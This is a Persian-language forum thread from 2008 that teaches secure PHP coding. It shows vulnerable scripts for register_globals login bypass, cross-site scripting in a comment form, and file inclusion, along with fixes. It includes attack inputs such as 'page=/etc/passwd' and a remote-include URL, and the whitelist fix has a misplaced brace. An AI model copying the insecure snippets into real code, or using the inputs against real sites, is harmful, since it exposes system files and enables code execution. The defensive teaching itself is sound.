برنامه نويسي Server Side

**r3llik** · 10-06-2008

[highlight=#FF8040]روش: سو استفاده از register_globals [/highlight]

سطح: مبتدي
زبان: PHP
بانک اطلاعاتی: ---
حد خطر: متوسط

يك نوع ناامني در php زماني پيش مياد كه register_globals روي سرور فعال باشه در اين صورت شما ميتونيد بدون تعريف يك متغيير ازش استفاده كنين مثلا در اسكريپت زير اگر كاربري كه لاگين ميكنه مدير باشه بهش اجازه ديدن صفحه secret.php داده ميشه

كد صفحه لاگين :

کد:

&lt;form method="get" action="login.php" >
&lt;input type="text" name="user">
&lt;input type="password" name="pass" >
&lt;input type="submit" name="login" value="login">
&lt;/form>

درخواست اين فرم به اين شكل ارسال ميشه :

تنها اعضای سایت میتوانند لینک ها رو ببینند.

برای ثبت نام کلیک کنید!! ... ****=123456در اين صورت خروجي برنامه زير يك ميشه و مدير ميتونه به صفحه secret.php بره

کد:

&lt;?php
if($user=="admin"){
   if($pass=="123456") $login=1;
}

if($login==1){
include("secret.php");
}
?>

خوب حالا يه هكر ميتونه از حفره اي كه تو اين اسكريپت وجود داره استفاده كنه
و در خواستي به شكل زير رو در مرورگرش تايپ كنه :

تنها اعضای سایت میتوانند لینک ها رو ببینند.

برای ثبت نام کلیک کنید!!

به همين راحتي ميتونه به اطلاعات صفحه secret.php دسترسي پيدا كنه
اما راه حلش :
1- اگه امكانش براتون هست register_globals رو غير فعال كنيد و از آرايه هاي انجمني استفاده كنيد مثل $_GET
2-به تمام متغير ها مقدار پيش فرض بدهيد مثلا كد بالا را بايد به صورت زير مينوشتيد:

کد:

&lt;?php
$login=0;
if($user=="admin"){
   if($pass=="password") $login=1;
}

if($login==1){
include("secret.php");
}
?>

**r3llik** · 10-06-2008

[highlight=#FF8040]روش: سو استفاده از ورودي كاربر [/highlight]
سطح: مبتدي
زبان: PHP
بانک اطلاعاتی: ---
حد خطر: کم

اين نا امني زماني پيش مياد كه ما ميخواييم يه ورودي براي كاربر در نظر بگيريم مثلا وبلاگهايي كه نظر كاربران رو بطور مستقيم نشون ميده
در اين حالت اگه هيچ بررسي اي روي ورودي كاربر انجام نشه هكر محترم ما ميتونه هر كد html و جاوايي رو كه دلش خواست به برنامه ما وارد كنه
براي مثال كد زير :

کد:

&lt;form method="post" action="nazar.php" > 
&lt;input type="text" name="name"> 
&lt;textarea name="nazarat" cols="60" rows="8">&lt;/textarea>
&lt;input type="submit" name="login" value="ersal"> 
&lt;/form>

اين فرم هر چي كه كاربر وارد كنه به اسكريپت زير ميفرسته

کد:

&lt;?php  
if ($name and $nazarat){
echo "$name neveshte :&lt;br>$nazarat";
}else{
echo"lotfan esme va nazare khod ra benvisid";
}
?>

اين اسكريپت هم هر چي كه كاربر وارد كرده باشه نمايش ميده حتي كدهاي html و جاوا
براي حل اين مشكل بايد از توابع php كه براي جلوگيري از اين كار هستش استفاده كنيد توابعي مثل :

کد:

htmlspecialchars()ا

گه ورودي شما فقط شامل اعداد ميشه مي تونيد با تابع زير صحتش رو چك كنيد

intval()

در نتيجه اسكريپت بالا رو اگه بشكل زير مينوشتيم مشكل حل مي شد

کد:

&lt;?php  
if ($name and $nazarat){
$name=htmlspecialchars($name);
$nazarat=htmlspecialchars($nazarat);
echo "$name neveshte :&lt;br>$nazarat";
}else{
echo"lotfan esme va nazare khod ra benvisid";
}
?>

با اين كار ديگه هكر محترم نميتونه هيچ كد html ي وارد كنه ..

**r3llik** · 10-06-2008

[highlight=#FF8040]روش: Include[/highlight]

سطح: مقدماتي
زبان: PHP
حد خطر: بالا

هرگز فايل يا نوشته اي را که از کاربر دريافت شده است را مستقيما ()include() , require و يا open نکنيد مگر اينکه از قبل آنرا بررسي کرده باشيد. به عنوان مثال فرض مي کنيم page$ فايلي است که کاربر وارد مي کند و ما قصد ()include کردن آنرا داريم.

کد:

if (isset($page)) 
{ 
include($page);
}

در اين مثال از آنجا که ما page$ را از قبل بررسي نکرده ايم ، کاربر براحتي مي تواند کدهاي ناخواسته و محرمانه ديگر ما را نيز صدا بزند. مثلا :

script.php?page=/etc/passwd

بنابراين ممکن است فايل ناخواسته اي که حاوي پسوردهاي شماست ()include شده و به نمايش در آيد. همانطور که مي دانيم وقتي يک کد غير php در آن ()include مي شود اين زبان به صورت پيش فرض آنرا HTML يا Text در نظر مي گيرد. پس به همين راحتي ممکن است صفحه ناخواسته اي بر روي سرور شما که شامل پسورد هم مي باشد به نمايش درآيد.

از طرف ديگر مي دانيم که تابع هاي ()include و ()require در php قابليت دريافت يک فايل از راه دور را دارا هستند. حال اگر کاربري فايلي مثل اين را صدا بزند :

script.php?page=http://mysite.com/MyScript.php

از اين طريق کاربر قادر خواهد بود تا هر کدي که مي خواهد در سايت شما صدا بزند. به فرض اگر او بخواهد مقداري از اطلاعات شما را پاک کند يا حتي اطلاعات حساسي را مستقيما در صفحه قرار دهد.

حال راه حل چيست؟ مسلما جاي ترديد نيست که در وهله اول بايد ورودي را مورد بررسي قرار دهيم! مثلا ليستي از صفحه هاي قابل قبول را تهيه کنيم و اگر ورودي با آن تطابق نداشت يک error نمايش دهيم.

کد:

$pages = array('index.html', 'page2.html', 'page3.html'); 
if (in_array($page,$pages)) 
{ 
include($page); 
{ 
else 
{ 
die("Sorry, Invalid file."); 
}

همانطور که ديديد در اين مثال ليستي از صفحه هاي قابل قبول را در آرايه اي به نام pages$ مي ريزيم و اگر صفحه ورودي در آرايه وجود داشت آنرا ()include مي کنيم. (در غير اين صورت پيغام Sorry, Invalid file را نمايش مي دهيم )